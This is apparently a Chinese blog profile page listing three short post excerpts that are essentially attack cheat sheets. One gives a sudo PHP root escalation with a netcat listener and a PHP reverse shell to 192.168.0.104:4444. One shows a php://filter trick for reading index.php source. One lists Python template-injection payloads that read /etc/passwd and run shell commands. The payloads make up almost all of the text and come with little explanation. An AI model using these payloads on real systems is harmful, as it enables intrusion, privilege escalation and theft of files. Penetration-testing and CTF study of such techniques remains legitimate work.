- 博客(3)
- 收藏
- 关注
原创 sudo -l 存在root /usr/bin/php 越权
root密码也可以是网站配置中数据库的密码nc -lvp 4444sudo /usr/bin/php -r '$sock=fsockopen("192.168.0.104",4444);exec("/bin/bash -i <&3 >&3 2>&3");'two越权sudo php -r 'system("/bin/bash");'...
2020-02-24 14:10:18 645
原创 php内置协议直接读取代码及preg_replace()任意php执行漏洞
尝试读取index.php的页面源码,通过php内置协议直接读取代码?page=php://filter/read=convert.base64-encode/resource=index.php
2020-02-17 16:05:08 476
原创 .py 模板注入
python模板注入 payload{{[].__class__.__base__.__subclasses__()[40]('/etc/passwd').read() }}[].__class__.__base__.__subclasses__()[59].__init__.func_globals['linecache'].__dict__.values()[12].popen('ls'...
2020-02-14 15:32:06 130
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人